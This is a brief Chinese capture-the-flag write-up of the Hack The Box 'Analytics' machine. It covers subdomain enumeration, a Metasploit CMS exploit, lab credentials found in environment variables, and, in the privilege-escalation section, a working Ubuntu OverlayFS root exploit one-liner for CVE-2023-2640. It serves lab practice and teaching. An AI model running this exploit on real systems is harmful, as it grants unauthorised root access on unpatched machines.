HTB-Analytics

2023-12-16 05:30:57

一、信息收集

绑定hosts文件

使用gobuster工具爆破子域名,爆出了一个地址

是一个登录页面

二、漏洞利用

发现这个cms存在漏洞

msfconsole里面有脚本

拿到shell

查看环境变量里面发现账号:metalytics 密码:An4lytics_ds20223#

连接成功

三、权限提升

查看系统版本号

找到提权漏洞https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/?rdt=39411

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("输入命令")'

文章来源:https://blog.csdn.net/qq_58528311/article/details/135020072
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。